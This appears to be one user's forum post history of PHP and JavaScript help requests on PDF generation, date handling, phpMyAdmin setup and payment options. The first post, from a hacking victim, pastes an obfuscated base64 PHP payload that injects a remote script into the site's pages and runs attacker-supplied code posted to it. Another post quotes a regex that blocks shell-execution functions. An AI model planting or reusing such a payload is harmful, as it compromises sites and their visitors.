tkm

Hello Friends, Need your help desperately. My site has just been hacked. Someone has put the following javascript code in my index file, config file. Code: eval(base64_decode('aWYoIWlzc2V0KCRkMGpuMSkpe2Z1bmN0aW9uIGQwam4oJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNj cmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYp KT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVn X21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwn ZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFte Pl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxz Kj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9 cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNl KCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXZZbmxrYVdOcmNtOWpheTV5ZFM5b2IzQmxMM2xo Ym1SbGVGODJObUUzT1RjelpqWmxZV1k1WW1FNUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxi b2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkk cy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBkMGpuMigkYSwkYiwkYywkZCl7Z2xvYmFsICRkMGpuMTskcz1hcnJheSgpO2lmKGZ1 bmN0aW9uX2V4aXN0cygkZDBqbjEpKWNhbGxfdXNlcl9mdW5jKCRkMGpuMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0 YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkMGpuJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJyli cmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRz KS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2Qwam4n KTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZDBqbmw9 KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2Qwam4yJykpIT0nZDBqbjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb J2UnXSkpOw==')); ?> I have XSS injection blocking code for all my inputs. Not sure at all, how this has happened. Any help would be greatly appreciated. Thankx.

Hello Mates, Need your help/knowledge. I need to convert html pages to pdf document. I have tried html2pdf php library but the formatting is very bad. I couldn't yet make dompdf library to work. I am looking for any opensource php (or javascript) library which can convert html pages to pdf by keeping atleast 98% of the formatting (css/html). Any suggestion would be great help. Thank you.

Hello Mates, A very basic question. How does the sign '#' effects any RE. For example the following RE #(alert|cmd|passthru|eval|exec|system|fopen|fsockopen|file|file_get_contents|readfile|unlink)(\s*)\((.*?)\)#si . What's the signaficance of the sign '#'. If anyone can kindly help me with this, that would be very much appreciated. Thank you.

Thank you all again. I surely got the picture. Thank you very much for spending some time in answering my query.

Thank you very much Adam. Got it. I would need authentication/certification from VISA or any others if I want my own CGI/Perl module to handle the payment process independently. This will be quite a pain. I will strongly advise my client to stick with paypal or any other third party companies which already have the license. Thank you again all. Great great help/suggestions...

Oh! Ok..!! Oops...!! So, I would unserstand that, in order to receive payments directly through the vendor cards my clients have to take certificates from VISA, MC and any other related vendors. That's quite a long process. Thank you very much for pointing the issue.

Hello Guys, It would be great if you can help me with some suggestions. I have integrated paypal payment module for my client's e-commerce site. Now they want an option to receive payments directly, without using paypal or any third party provider. So that will take user card details charge maoney later. Now, i ahven't done this kind of functionality before (without using any third party provider). I can surely save the card information in the database through a form. But what happens next? How can I/they credit the momey from buyer's bank? Do they need to have any legal permission from any authorities? Do I need to add any module? Any advise would be a great help. Thank you.

Hello Mates, I am using the following function to get the month name from week number of a year. date( "M", strtotime( "+$wk_no week", mktime(0, 0, 0, 1, 1, 2008) ) ) But what happens when the week extends to 2 different months ? Can anyone help me with any insights or suggestions ? Thank you.

Hello Mates, Need a small help. Can anyone provide me insights or some few lines of code on how can I get month's name from providing the week and year information. Say I want to know the name of the month of 2nd week of year 2008. Any help would be greatly appreciated. Thank you.

Hello Mates, I am trying to configure config.inc.php for phpmyadmin. I am doing the following: $cfg['Servers'][$i]['host'] = 'localhost'; $cfg['Servers'][$i]['port'] = ''; $cfg['Servers'][$i]['socket'] = ''; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['compress'] = FALSE; $cfg['Servers'][$i]['controluser'] = 'pma'; $cfg['Servers'][$i]['controlpass'] = 'pmapass'; $cfg['Servers'][$i]['auth_type'] = 'http'; $cfg['Servers'][$i]['user'] = ''; $cfg['Servers'][$i]['password'] = ''; GRANT USAGE ON mysql.* TO 'pma'@'localhost' IDENTIFIED BY 'pmapass'; GRANT SELECT (Host, User, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv) ON mysql.user TO 'pma'@'localhost'; GRANT SELECT ON mysql.db TO 'pma'@'localhost'; GRANT SELECT ON mysql.host TO 'pma'@'localhost'; GRANT SELECT (Host, Db, User, Table_name, Table_priv, Column_priv) ON mysql.tables_priv TO 'pma'@'localhost'; when I open phpmyadmin index page, it doesn't take my root username/password. However I can log into phpmyadmin when I use the same root username and password in config auth_type. Can anyone please point out where I am doing wrong? Thank you.

Hello mates, I am trying to use javascript search method to look for a string. Here is my code: for (;i<100;i++) { var search_txt=el.getValue(); var rg = new RegExp(search_txt,'i'); var cname=record.data.company_name; if (cname.search(rg)>=0) return true; } But my above code is not working. Can someone kindly point out what I am doing wrong. It will be a great help. Thank you.

Hello Mates, I am using the following code to download a pdf file of size 3MB. function readfile_chunked($filename,$retbytes=true) { $chunksize = 1*(1024*1024); // how many bytes per chunk $buffer = ''; $cnt =0; // $handle = fopen($filename, 'rb'); $handle = fopen($filename, 'rb'); if ($handle === false) { return false; } while (!feof($handle)) { $buffer = fread($handle, $chunksize); echo $buffer; ob_flush(); flush(); if ($retbytes) { $cnt += strlen($buffer); } } $status = fclose($handle); if ($retbytes && $status) { return $cnt; // return num. bytes delivered like readfile() does. } return $status; } $file="test.pdf"; ob_start(); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: public"); header("Content-Type: application/pdf"); header("Content-Transfer-Encoding: binary"); header("Content-Length: ".filesize($file)); ob_end_flush(); set_time_limit(0); //readfile($file); readfile_chunked($file); exit; I put in all available suggestions I got in order to make it faster and hence all the above extra code. But still it is taking too much time to show the pdf on browser. Any suggestion would be great help. Thank you.

Thank you. I will do that. *** BTW, I am 30 and I am taking advise from a 15 year old. Should I just die or what. However, I will pretend, I haven't read your profile. Just kidding....

Hmmm....good question. ??? I understand if I just put the select database function at the top of the page, that should do. Isn't that what you were refering to? Thank you.

Thank you. I will do. Your suggestions are very constructive. Take care.